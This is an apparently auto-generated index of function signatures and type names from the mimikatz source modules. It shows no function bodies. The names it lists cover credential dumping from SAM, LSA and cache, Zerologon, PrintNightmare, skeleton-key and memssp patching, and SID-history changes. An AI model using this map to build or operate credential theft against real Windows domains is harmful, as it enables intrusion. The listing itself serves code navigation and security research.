function kuhl_m_iis_apphost_genericEnumNodes (line 38) | void kuhl_m_iis_apphost_genericEnumNodes(int argc, wchar_t * argv[], IXM...
function kuhl_m_iis_apphost_apppool (line 76) | void kuhl_m_iis_apphost_apppool(int argc, wchar_t * argv[], IXMLDOMDocum...
function kuhl_m_iis_apphost_site (line 101) | void kuhl_m_iis_apphost_site(int argc, wchar_t * argv[], IXMLDOMDocument...
function kuhl_m_iis_maybeEncrypted (line 178) | void kuhl_m_iis_maybeEncrypted(int argc, wchar_t * argv[], IXMLDOMDocume...
function BOOL (line 224) | BOOL kuhl_m_iis_apphost_provider(int argc, wchar_t * argv[], IXMLDOMDocu...
function kuhl_m_iis_apphost_provider_decrypt (line 276) | void kuhl_m_iis_apphost_provider_decrypt(int argc, wchar_t * argv[], PCW...
FILE: mimikatz/modules/kuhl_m_iis.h
type IISXMLType (line 17) | typedef enum _IISXMLType {
FILE: mimikatz/modules/kuhl_m_kernel.c
function NTSTATUS (line 30) | NTSTATUS kuhl_m_kernel_do(wchar_t * input)
function NTSTATUS (line 56) | NTSTATUS kuhl_m_kernel_add_mimidrv(int argc, wchar_t * argv[])
function NTSTATUS (line 70) | NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[])
function NTSTATUS (line 76) | NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[])
function NTSTATUS (line 129) | NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[])
function NTSTATUS (line 151) | NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
function NTSTATUS (line 163) | NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
function NTSTATUS (line 216) | NTSTATUS kuhl_m_kernel_sysenv_del(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_kernel.h
type KUHL_K_C (line 15) | typedef struct _KUHL_K_C {
FILE: mimikatz/modules/kuhl_m_lsadump.c
function NTSTATUS (line 32) | NTSTATUS kuhl_m_lsadump_sam(int argc, wchar_t * argv[])
function NTSTATUS (line 93) | NTSTATUS kuhl_m_lsadump_secrets(int argc, wchar_t * argv[])
function NTSTATUS (line 98) | NTSTATUS kuhl_m_lsadump_cache(int argc, wchar_t * argv[])
function NTSTATUS (line 103) | NTSTATUS kuhl_m_lsadump_secretsOrCache(int argc, wchar_t * argv[], BOOL ...
function BOOL (line 245) | BOOL kuhl_m_lsadump_getCurrentControlSet(PKULL_M_REGISTRY_HANDLE hRegist...
function BOOL (line 274) | BOOL kuhl_m_lsadump_getSyskey(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hL...
function BOOL (line 303) | BOOL kuhl_m_lsadump_getComputerAndSyskey(IN PKULL_M_REGISTRY_HANDLE hReg...
function BOOL (line 336) | BOOL kuhl_m_lsadump_getUsersAndSamKey(IN PKULL_M_REGISTRY_HANDLE hRegist...
function BOOL (line 412) | BOOL kuhl_m_lsadump_getHash(PSAM_SENTRY pSamHash, LPCBYTE pStartOfData, ...
function BOOL (line 471) | BOOL kuhl_m_lsadump_getSupplementalCreds(IN PKULL_M_REGISTRY_HANDLE hReg...
function BOOL (line 513) | BOOL kuhl_m_lsadump_getSamKey(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hA...
function BOOL (line 571) | BOOL kuhl_m_lsadump_getSids(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKE...
function BOOL (line 600) | BOOL kuhl_m_lsadump_getLsaKeyAndSecrets(IN PKULL_M_REGISTRY_HANDLE hSecu...
function BOOL (line 693) | BOOL kuhl_m_lsadump_getSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN ...
function BOOL (line 751) | BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSe...
function kuhl_m_lsadump_printMsCache (line 902) | void kuhl_m_lsadump_printMsCache(PMSCACHE_ENTRY entry, CHAR version)
function BOOL (line 952) | BOOL kuhl_m_lsadump_decryptSCCache(PBYTE data, DWORD size, HCRYPTPROV hP...
function kuhl_m_lsadump_getInfosFromServiceName (line 1070) | void kuhl_m_lsadump_getInfosFromServiceName(IN PKULL_M_REGISTRY_HANDLE h...
function BOOL (line 1081) | BOOL kuhl_m_lsadump_decryptSecret(IN PKULL_M_REGISTRY_HANDLE hSecurity, ...
function kuhl_m_lsadump_candidateSecret (line 1131) | void kuhl_m_lsadump_candidateSecret(DWORD szBytesSecrets, PVOID bufferSe...
function BOOL (line 1201) | BOOL kuhl_m_lsadump_sec_aes256(PNT6_HARD_SECRET hardSecretBlob, DWORD ha...
function NTSTATUS (line 1292) | NTSTATUS kuhl_m_lsadump_lsa(int argc, wchar_t * argv[])
function BOOL (line 1444) | BOOL kuhl_m_lsadump_lsa_getHandle(PKULL_M_MEMORY_HANDLE * hMemory, DWORD...
function kuhl_m_lsadump_lsa_user (line 1464) | void kuhl_m_lsadump_lsa_user(SAMPR_HANDLE DomainHandle, PSID DomainSid, ...
function kuhl_m_lsadump_lsa_DescrBuffer (line 1520) | void kuhl_m_lsadump_lsa_DescrBuffer(DWORD type, DWORD rid, PVOID Buffer,...
function PKERB_KEY_DATA (line 1595) | PKERB_KEY_DATA kuhl_m_lsadump_lsa_keyDataInfo(PVOID base, PKERB_KEY_DATA...
function PKERB_KEY_DATA_NEW (line 1612) | PKERB_KEY_DATA_NEW kuhl_m_lsadump_lsa_keyDataNewInfo(PVOID base, PKERB_K...
function kuhl_m_lsadump_trust_authinformation (line 1636) | void kuhl_m_lsadump_trust_authinformation(PLSA_AUTH_INFORMATION info, DW...
function NTSTATUS (line 1707) | NTSTATUS kuhl_m_lsadump_trust(int argc, wchar_t * argv[])
function NTSTATUS (line 1804) | NTSTATUS kuhl_m_lsadump_LsaRetrievePrivateData(PCWSTR systemName, PCWSTR...
function kuhl_m_lsadump_analyzeKey (line 1860) | void kuhl_m_lsadump_analyzeKey(LPCGUID guid, PKIWI_BACKUP_KEY secret, DW...
function NTSTATUS (line 1922) | NTSTATUS kuhl_m_lsadump_getKeyFromGUID(LPCGUID guid, BOOL isExport, LPCW...
function NTSTATUS (line 1945) | NTSTATUS kuhl_m_lsadump_bkey(int argc, wchar_t * argv[])
function NTSTATUS (line 1992) | NTSTATUS kuhl_m_lsadump_rpdata(int argc, wchar_t * argv[])
function NTSTATUS (line 2014) | NTSTATUS kuhl_m_lsadump_netsync(int argc, wchar_t * argv[])
function NTSTATUS (line 2100) | NTSTATUS kuhl_m_lsadump_netsync_NlComputeCredentials(PBYTE input, PBYTE ...
function kuhl_m_lsadump_netsync_AddTimeStampForAuthenticator (line 2108) | void kuhl_m_lsadump_netsync_AddTimeStampForAuthenticator(PNETLOGON_CREDE...
function NTSTATUS (line 2119) | NTSTATUS CALLBACK kuhl_m_lsadump_setntlm_callback(SAMPR_HANDLE hUser, PV...
function NTSTATUS (line 2128) | NTSTATUS kuhl_m_lsadump_setntlm(int argc, wchar_t * argv[])
function NTSTATUS (line 2168) | NTSTATUS CALLBACK kuhl_m_lsadump_changentlm_callback(SAMPR_HANDLE hUser,...
function NTSTATUS (line 2182) | NTSTATUS kuhl_m_lsadump_changentlm(int argc, wchar_t * argv[])
function NTSTATUS (line 2235) | NTSTATUS kuhl_m_lsadump_enumdomains_users(int argc, wchar_t * argv[], DW...
function NTSTATUS (line 2267) | NTSTATUS kuhl_m_lsadump_enumdomains_users_data(PLSA_UNICODE_STRING uServ...
function NTSTATUS (line 2356) | NTSTATUS kuhl_m_lsadump_packages(int argc, wchar_t * argv[])
function BOOL (line 2405) | BOOL kuhl_m_lsadump_mbc_data(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HK...
function NTSTATUS (line 2424) | NTSTATUS kuhl_m_lsadump_mbc(int argc, wchar_t * argv[])
function handle_t (line 2462) | handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name) {retur...
function LOGONSRV_HANDLE_unbind (line 2463) | void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t...
function NTSTATUS (line 2470) | NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[])
function NTSTATUS (line 2562) | NTSTATUS CALLBACK kuhl_m_lsadump_update_dc_password_callback(SAMPR_HANDL...
function NTSTATUS (line 2573) | NTSTATUS kuhl_m_lsadump_update_dc_password(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_lsadump.h
type SAM_ENTRY (line 29) | typedef struct _SAM_ENTRY {
type KIWI_BACKUP_KEY (line 35) | typedef struct _KIWI_BACKUP_KEY {
type NTDS_LSA_AUTH_INFORMATION (line 42) | typedef struct _NTDS_LSA_AUTH_INFORMATION {
type NTDS_LSA_AUTH_INFORMATIONS (line 49) | typedef struct _NTDS_LSA_AUTH_INFORMATIONS {
type DOMAIN_SERVER_ROLE (line 94) | typedef enum _DOMAIN_SERVER_ROLE
type DOMAIN_SERVER_ENABLE_STATE (line 100) | typedef enum _DOMAIN_SERVER_ENABLE_STATE
type OLD_LARGE_INTEGER (line 106) | typedef struct _OLD_LARGE_INTEGER {
type SAM_KEY_DATA (line 111) | typedef struct _SAM_KEY_DATA {
type SAM_KEY_DATA_AES (line 139) | typedef struct _SAM_KEY_DATA_AES {
type DOMAIN_ACCOUNT_F (line 148) | typedef struct _DOMAIN_ACCOUNT_F {
type USER_ACCOUNT_V (line 175) | typedef struct _USER_ACCOUNT_V {
type SAM_HASH_AES (line 196) | typedef struct _SAM_HASH_AES {
type SAM_HASH (line 204) | typedef struct _SAM_HASH {
type POL_REVISION (line 210) | typedef struct _POL_REVISION {
type NT6_CLEAR_SECRET (line 215) | typedef struct _NT6_CLEAR_SECRET {
type NT6_HARD_SECRET (line 224) | typedef struct _NT6_HARD_SECRET {
type NT6_SYSTEM_KEY (line 236) | typedef struct _NT6_SYSTEM_KEY {
type NT6_SYSTEM_KEYS (line 243) | typedef struct _NT6_SYSTEM_KEYS {
type NT5_HARD_SECRET (line 251) | typedef struct _NT5_HARD_SECRET {
type NT5_SYSTEM_KEY (line 258) | typedef struct _NT5_SYSTEM_KEY {
type NT5_SYSTEM_KEYS (line 263) | typedef struct _NT5_SYSTEM_KEYS {
type MSCACHE_ENTRY (line 271) | typedef struct _MSCACHE_ENTRY {
type MSCACHE_ENTRY_PTR (line 298) | typedef struct _MSCACHE_ENTRY_PTR {
type MSCACHE_DATA (line 317) | typedef struct _MSCACHE_DATA {
type KIWI_ENC_SC_DATA (line 332) | typedef struct _KIWI_ENC_SC_DATA {
type KIWI_ENC_SC_DATA_NEW (line 338) | typedef struct _KIWI_ENC_SC_DATA_NEW {
type NTLM_SUPPLEMENTAL_CREDENTIAL_V4 (line 347) | typedef struct _NTLM_SUPPLEMENTAL_CREDENTIAL_V4 {
type WDIGEST_CREDENTIALS (line 354) | typedef struct _WDIGEST_CREDENTIALS {
type KERB_KEY_DATA (line 363) | typedef struct _KERB_KEY_DATA {
type KERB_STORED_CREDENTIAL (line 372) | typedef struct _KERB_STORED_CREDENTIAL {
type KERB_KEY_DATA_NEW (line 386) | typedef struct _KERB_KEY_DATA_NEW {
type KERB_STORED_CREDENTIAL_NEW (line 396) | typedef struct _KERB_STORED_CREDENTIAL_NEW {
type LSA_SUPCREDENTIAL (line 415) | typedef struct _LSA_SUPCREDENTIAL {
type LSA_SUPCREDENTIALS (line 422) | typedef struct _LSA_SUPCREDENTIALS {
type LSA_SUPCREDENTIALS_BUFFERS (line 427) | typedef struct _LSA_SUPCREDENTIALS_BUFFERS {
type KUHL_LSADUMP_DCC_CACHE_DATA (line 433) | typedef struct _KUHL_LSADUMP_DCC_CACHE_DATA {
type KIWI_LSA_PRIVATE_DATA (line 443) | typedef struct _KIWI_LSA_PRIVATE_DATA {
type TBAL_UNICODE_STRING_F32 (line 464) | typedef struct _TBAL_UNICODE_STRING_F32 {
type KIWI_TBAL_MSV (line 470) | typedef struct _KIWI_TBAL_MSV {
type KIWI_ENCRYPTED_SUPPLEMENTAL_CREDENTIALS (line 484) | typedef struct _KIWI_ENCRYPTED_SUPPLEMENTAL_CREDENTIALS {
type KUHL_M_LSADUMP_CHANGENTLM_DATA (line 527) | typedef struct _KUHL_M_LSADUMP_CHANGENTLM_DATA {
FILE: mimikatz/modules/kuhl_m_lsadump_remote.c
function DWORD (line 9) | DWORD WINAPI kuhl_sekurlsa_samsrv_thread(PREMOTE_LIB_DATA lpParameter)
function DWORD (line 106) | DWORD kuhl_sekurlsa_samsrv_thread_end(){return 'lsar';}
FILE: mimikatz/modules/kuhl_m_lsadump_remote.h
type KIWI_SAMPR_USER_INTERNAL42_INFORMATION (line 10) | typedef struct _KIWI_SAMPR_USER_INTERNAL42_INFORMATION {
type PVOID (line 32) | typedef PVOID (__cdecl * PMEMCPY) (__out_bcount_full_opt(_MaxCount) voi...
FILE: mimikatz/modules/kuhl_m_minesweeper.c
function NTSTATUS (line 26) | NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_minesweeper.h
type STRUCT_MINESWEEPER_REF_ELEMENT (line 15) | typedef struct _STRUCT_MINESWEEPER_REF_ELEMENT {
type STRUCT_MINESWEEPER_BOARD (line 24) | typedef struct _STRUCT_MINESWEEPER_BOARD {
type STRUCT_MINESWEEPER_GAME (line 47) | typedef struct _STRUCT_MINESWEEPER_GAME {
FILE: mimikatz/modules/kuhl_m_misc.c
function NTSTATUS (line 43) | NTSTATUS kuhl_m_misc_cmd(int argc, wchar_t * argv[])
function NTSTATUS (line 49) | NTSTATUS kuhl_m_misc_regedit(int argc, wchar_t * argv[])
function NTSTATUS (line 55) | NTSTATUS kuhl_m_misc_taskmgr(int argc, wchar_t * argv[])
function NTSTATUS (line 64) | NTSTATUS kuhl_m_misc_ncroutemon(int argc, wchar_t * argv[])
function BOOL (line 70) | BOOL CALLBACK kuhl_m_misc_detours_callback_module_name_addr(PKULL_M_PROC...
function PBYTE (line 80) | PBYTE kuhl_m_misc_detours_testHookDestination(PKULL_M_MEMORY_ADDRESS bas...
function BOOL (line 136) | BOOL CALLBACK kuhl_m_misc_detours_callback_module_exportedEntry(PKULL_M_...
function BOOL (line 171) | BOOL CALLBACK kuhl_m_misc_detours_callback_module(PKULL_M_PROCESS_VERY_B...
function BOOL (line 177) | BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFOR...
function NTSTATUS (line 200) | NTSTATUS kuhl_m_misc_detours(int argc, wchar_t * argv[])
function BOOL (line 206) | BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableSt...
type FILE (line 469) | typedef FILE * (__cdecl * PFOPEN)(__in_z const char * _Filename, __in_z ...
function NTSTATUS (line 473) | NTSTATUS NTAPI misc_msv1_0_SpAcceptCredentials(SECURITY_LOGON_TYPE Logon...
function DWORD (line 487) | DWORD misc_msv1_0_SpAcceptCredentials_end(){return 'mssp';}
function NTSTATUS (line 519) | NTSTATUS kuhl_m_misc_memssp(int argc, wchar_t * argv[])
type PVOID (line 605) | typedef PVOID (__cdecl * PMEMCPY) (__out_bcount_full_opt(_MaxCount) void...
function NTSTATUS (line 609) | NTSTATUS WINAPI kuhl_misc_skeleton_rc4_init(LPCVOID Key, DWORD KeySize, ...
function NTSTATUS (line 637) | NTSTATUS WINAPI kuhl_misc_skeleton_rc4_init_decrypt(PVOID pContext, LPCV...
function DWORD (line 657) | DWORD kuhl_misc_skeleton_rc4_end(){return 'skel';}
function NTSTATUS (line 661) | NTSTATUS kuhl_m_misc_skeleton(int argc, wchar_t * argv[])
function NTSTATUS (line 754) | NTSTATUS kuhl_m_misc_compress(int argc, wchar_t * argv[])
function NTSTATUS (line 789) | NTSTATUS kuhl_m_misc_lock(int argc, wchar_t * argv[])
function BOOL (line 800) | BOOL CALLBACK kuhl_m_misc_lock_callback(PSYSTEM_PROCESS_INFORMATION pSys...
function DWORD (line 813) | DWORD WINAPI kuhl_m_misc_lock_thread(PREMOTE_LIB_DATA lpParameter)
function DWORD (line 820) | DWORD kuhl_m_misc_lock_thread_end(){return 'stlo';}
function kuhl_m_misc_lock_for_pid (line 823) | void kuhl_m_misc_lock_for_pid(DWORD pid, PCWCHAR wp)
function NTSTATUS (line 864) | NTSTATUS kuhl_m_misc_wp(int argc, wchar_t * argv[])
function BOOL (line 880) | BOOL CALLBACK kuhl_m_misc_wp_callback(PSYSTEM_PROCESS_INFORMATION pSyste...
function DWORD (line 893) | DWORD WINAPI kuhl_m_misc_wp_thread(PREMOTE_LIB_DATA lpParameter)
function DWORD (line 900) | DWORD kuhl_m_misc_wp_thread_end(){return 'stwp';}
function kuhl_m_misc_wp_for_pid (line 903) | void kuhl_m_misc_wp_for_pid(DWORD pid, PCWCHAR wp)
function NTSTATUS (line 944) | NTSTATUS kuhl_m_misc_mflt(int argc, wchar_t * argv[])
function kuhl_m_misc_mflt_display (line 986) | void kuhl_m_misc_mflt_display(PFILTER_AGGREGATE_BASIC_INFORMATION info)
function NTSTATUS (line 1031) | NTSTATUS kuhl_m_misc_easyntlmchall(int argc, wchar_t * argv[])
function NTSTATUS (line 1043) | NTSTATUS kuhl_m_misc_clip(int argc, wchar_t * argv[])
function BOOL (line 1135) | BOOL WINAPI kuhl_misc_clip_WinHandlerRoutine(DWORD dwCtrlType)
function LRESULT (line 1144) | LRESULT APIENTRY kuhl_m_misc_clip_MainWndProc(HWND hwnd, UINT uMsg, WPAR...
function NTSTATUS (line 1210) | NTSTATUS kuhl_m_misc_xor(int argc, wchar_t * argv[])
function NTSTATUS (line 1244) | NTSTATUS kuhl_m_misc_aadcookie(int argc, wchar_t * argv[])
function NTSTATUS (line 1282) | NTSTATUS kuhl_m_misc_aadcookie_NgcSignWithSymmetricPopKey(int argc, wcha...
function handle_t (line 1343) | handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hS...
function STRING_HANDLE_unbind (line 1344) | void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSp...
function NTSTATUS (line 1345) | NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
function NTSTATUS (line 1478) | NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
function NTSTATUS (line 1598) | NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
function BOOL (line 1704) | BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR s...
function BOOL (line 1754) | BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOO...
function kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete (line 1827) | void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, ...
function BOOL (line 1855) | BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t h...
function BOOL (line 1892) | BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_...
function BOOL (line 1924) | BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemo...
type SCCM_ENCRYPTED_HEADER (line 1974) | typedef struct _SCCM_ENCRYPTED_HEADER {
function NTSTATUS (line 1981) | NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[])
function NTSTATUS (line 2113) | NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[])
function NTSTATUS (line 2191) | NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[])
function NTSTATUS (line 2197) | NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_misc.h
type KUHL_M_MISC_DETOURS_HOOKS (line 70) | typedef struct _KUHL_M_MISC_DETOURS_HOOKS {
type KIWI_WP_DATA (line 94) | typedef struct _KIWI_WP_DATA {
type interface (line 113) | typedef interface IProofOfPossessionCookieInfoManager
type ProofOfPossessionCookieInfo (line 116) | typedef struct ProofOfPossessionCookieInfo {
type IProofOfPossessionCookieInfoManagerVtbl (line 123) | typedef struct IProofOfPossessionCookieInfoManagerVtbl {
function interface (line 132) | interface IProofOfPossessionCookieInfoManager {
FILE: mimikatz/modules/kuhl_m_net.c
function NTSTATUS (line 28) | NTSTATUS kuhl_m_net_user(int argc, wchar_t * argv[])
function NTSTATUS (line 151) | NTSTATUS kuhl_m_net_group(int argc, wchar_t * argv[])
function NTSTATUS (line 235) | NTSTATUS kuhl_m_net_alias(int argc, wchar_t * argv[])
function kuhl_m_net_simpleLookup (line 317) | void kuhl_m_net_simpleLookup(SAMPR_HANDLE hDomainHandle, DWORD rid)
function NTSTATUS (line 377) | NTSTATUS kuhl_m_net_session(int argc, wchar_t * argv[])
function NTSTATUS (line 405) | NTSTATUS kuhl_m_net_wsession(int argc, wchar_t * argv[])
function NTSTATUS (line 436) | NTSTATUS kuhl_m_net_tod(int argc, wchar_t * argv[])
function NTSTATUS (line 469) | NTSTATUS kuhl_m_net_stats(int argc, wchar_t * argv[])
function kuhl_m_net_share_type (line 485) | void kuhl_m_net_share_type(DWORD type)
function NTSTATUS (line 512) | NTSTATUS kuhl_m_net_share(int argc, wchar_t * argv[])
function NTSTATUS (line 552) | NTSTATUS kuhl_m_net_serverinfo(int argc, wchar_t * argv[])
function NTSTATUS (line 581) | NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
function NTSTATUS (line 742) | NTSTATUS kuhl_m_net_deleg(int argc, wchar_t * argv[])
function NTSTATUS (line 860) | NTSTATUS kuhl_m_net_dcom_if(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_privilege.c
function NTSTATUS (line 26) | NTSTATUS kuhl_m_privilege_simple(ULONG privId)
function NTSTATUS (line 36) | NTSTATUS kuhl_m_privilege_id(int argc, wchar_t * argv[])
function NTSTATUS (line 45) | NTSTATUS kuhl_m_privilege_name(int argc, wchar_t * argv[])
function NTSTATUS (line 63) | NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])
function NTSTATUS (line 68) | NTSTATUS kuhl_m_privilege_driver(int argc, wchar_t * argv[])
function NTSTATUS (line 73) | NTSTATUS kuhl_m_privilege_security(int argc, wchar_t * argv[])
function NTSTATUS (line 78) | NTSTATUS kuhl_m_privilege_tcb(int argc, wchar_t * argv[])
function NTSTATUS (line 82) | NTSTATUS kuhl_m_privilege_backup(int argc, wchar_t * argv[])
function NTSTATUS (line 87) | NTSTATUS kuhl_m_privilege_restore(int argc, wchar_t * argv[])
function NTSTATUS (line 92) | NTSTATUS kuhl_m_privilege_sysenv(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_process.c
function NTSTATUS (line 25) | NTSTATUS kuhl_m_process_list(int argc, wchar_t * argv[])
function NTSTATUS (line 30) | NTSTATUS kuhl_m_process_start(int argc, wchar_t * argv[])
function NTSTATUS (line 45) | NTSTATUS kuhl_m_process_stop(int argc, wchar_t * argv[])
function NTSTATUS (line 50) | NTSTATUS kuhl_m_process_suspend(int argc, wchar_t * argv[])
function NTSTATUS (line 55) | NTSTATUS kuhl_m_process_resume(int argc, wchar_t * argv[])
function NTSTATUS (line 60) | NTSTATUS kuhl_m_process_genericOperation(int argc, wchar_t * argv[], KUH...
function BOOL (line 116) | BOOL CALLBACK kuhl_m_process_list_callback_process(PSYSTEM_PROCESS_INFOR...
function NTSTATUS (line 131) | NTSTATUS kuhl_m_process_exports(int argc, wchar_t * argv[])
function NTSTATUS (line 136) | NTSTATUS kuhl_m_process_imports(int argc, wchar_t * argv[])
function NTSTATUS (line 141) | NTSTATUS kuhl_m_process_callbackProcess(int argc, wchar_t * argv[], PKUL...
function BOOL (line 172) | BOOL CALLBACK kuhl_m_process_exports_callback_module(PKULL_M_PROCESS_VER...
function BOOL (line 179) | BOOL CALLBACK kuhl_m_process_exports_callback_module_exportedEntry(PKULL...
function BOOL (line 202) | BOOL CALLBACK kuhl_m_process_imports_callback_module(PKULL_M_PROCESS_VER...
function BOOL (line 209) | BOOL CALLBACK kuhl_m_process_imports_callback_module_importedEntry(PKULL...
function BOOL (line 219) | BOOL kull_m_process_run_data(LPCWSTR commandLine, HANDLE hToken)
function NTSTATUS (line 266) | NTSTATUS kuhl_m_process_run(int argc, wchar_t * argv[])
function NTSTATUS (line 278) | NTSTATUS kuhl_m_process_runParent(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_process.h
type KUHL_M_PROCESS_GENERICOPERATION (line 17) | typedef enum _KUHL_M_PROCESS_GENERICOPERATION {
FILE: mimikatz/modules/kuhl_m_rdm.c
function NTSTATUS (line 17) | NTSTATUS kuhl_m_rdm_version(int argc, wchar_t * argv[])
function NTSTATUS (line 41) | NTSTATUS kuhl_m_rdm_list(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_rpc.c
function NTSTATUS (line 25) | NTSTATUS kuhl_m_c_rpc_init()
function NTSTATUS (line 35) | NTSTATUS kuhl_m_c_rpc_clean()
function NTSTATUS (line 43) | NTSTATUS kuhl_m_rpc_do(wchar_t * input)
function NTSTATUS (line 87) | NTSTATUS kuhl_m_rpc_close(int argc, wchar_t * argv[])
function NTSTATUS (line 122) | NTSTATUS kuhl_m_rpc_enum(int argc, wchar_t * argv[])
function DWORD (line 187) | DWORD WINAPI kuhl_m_rpc_server_start(LPVOID lpThreadParameter)
function NTSTATUS (line 266) | NTSTATUS kuhl_m_rpc_server(int argc, wchar_t * argv[])
function NTSTATUS (line 300) | NTSTATUS kuhl_m_rpc_connect(int argc, wchar_t * argv[])
function NTSTATUS (line 370) | NTSTATUS SRV_MimiBind(handle_t rpc_handle, PMIMI_PUBLICKEY clientPublicK...
function NTSTATUS (line 404) | NTSTATUS SRV_MiniUnbind(MIMI_HANDLE *phMimi)
function NTSTATUS (line 414) | NTSTATUS SRV_MimiCommand(MIMI_HANDLE phMimi, DWORD szEncCommand, BYTE *e...
function NTSTATUS (line 462) | NTSTATUS SRV_MimiClear(handle_t rpc_handle, wchar_t *command, DWORD *siz...
function SRV_MIMI_HANDLE_rundown (line 490) | void __RPC_USER SRV_MIMI_HANDLE_rundown(MIMI_HANDLE phMimi)
FILE: mimikatz/modules/kuhl_m_rpc.h
type KUHL_M_RPC_SERVER_INF (line 24) | typedef struct _KUHL_M_RPC_SERVER_INF {
FILE: mimikatz/modules/kuhl_m_service.c
function NTSTATUS (line 31) | NTSTATUS kuhl_m_c_service_init()
function NTSTATUS (line 38) | NTSTATUS kuhl_m_c_service_clean()
function NTSTATUS (line 45) | NTSTATUS genericFunction(KUHL_M_SERVICE_FUNC function, wchar_t * text, i...
function NTSTATUS (line 69) | NTSTATUS kuhl_m_service_start(int argc, wchar_t * argv[])
function NTSTATUS (line 74) | NTSTATUS kuhl_m_service_remove(int argc, wchar_t * argv[])
function NTSTATUS (line 79) | NTSTATUS kuhl_m_service_stop(int argc, wchar_t * argv[])
function NTSTATUS (line 84) | NTSTATUS kuhl_m_service_suspend(int argc, wchar_t * argv[])
function NTSTATUS (line 89) | NTSTATUS kuhl_m_service_resume(int argc, wchar_t * argv[])
function NTSTATUS (line 94) | NTSTATUS kuhl_m_service_preshutdown(int argc, wchar_t * argv[])
function NTSTATUS (line 99) | NTSTATUS kuhl_m_service_shutdown(int argc, wchar_t * argv[])
function NTSTATUS (line 104) | NTSTATUS kuhl_m_service_list(int argc, wchar_t * argv[])
function NTSTATUS (line 110) | NTSTATUS kuhl_m_service_installme(int argc, wchar_t * argv[])
function NTSTATUS (line 141) | NTSTATUS kuhl_m_service_uninstallme(int argc, wchar_t * argv[])
function NTSTATUS (line 147) | NTSTATUS kuhl_m_service_me(int argc, wchar_t * argv[])
function kuhl_m_service_CtrlHandler (line 158) | void WINAPI kuhl_m_service_CtrlHandler(DWORD Opcode)
function kuhl_m_service_Main (line 185) | void WINAPI kuhl_m_service_Main(DWORD argc, LPTSTR *argv)
FILE: mimikatz/modules/kuhl_m_service.h
type BOOL (line 17) | typedef BOOL (* KUHL_M_SERVICE_FUNC) (PCWSTR serviceName);
FILE: mimikatz/modules/kuhl_m_service_remote.c
function DWORD (line 33) | DWORD WINAPI kuhl_service_sendcontrol_std_thread(PREMOTE_LIB_DATA lpPara...
function DWORD (line 38) | DWORD kuhl_service_sendcontrol_std_thread_end(){return 'svcs';}
function DWORD (line 40) | DWORD WINAPI kuhl_service_sendcontrol_fast_thread(PREMOTE_LIB_DATA lpPar...
function DWORD (line 45) | DWORD kuhl_service_sendcontrol_fast_thread_end(){return 'svcf';}
function BOOL (line 48) | BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
FILE: mimikatz/modules/kuhl_m_service_remote.h
type DWORD (line 12) | typedef DWORD ( __stdcall * PSCSENDCONTROL_STD) (LPCWSTR lpServiceName, ...
type DWORD (line 13) | typedef DWORD (__fastcall * PSCSENDCONTROL_FAST)(LPCWSTR lpServiceName, ...
FILE: mimikatz/modules/kuhl_m_sid.c
function NTSTATUS (line 23) | NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
function NTSTATUS (line 73) | NTSTATUS kuhl_m_sid_query(int argc, wchar_t * argv[])
function NTSTATUS (line 89) | NTSTATUS kuhl_m_sid_modify(int argc, wchar_t * argv[])
function NTSTATUS (line 131) | NTSTATUS kuhl_m_sid_add(int argc, wchar_t * argv[])
function NTSTATUS (line 176) | NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[])
function NTSTATUS (line 229) | NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[])
function kuhl_m_sid_displayMessage (line 251) | void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
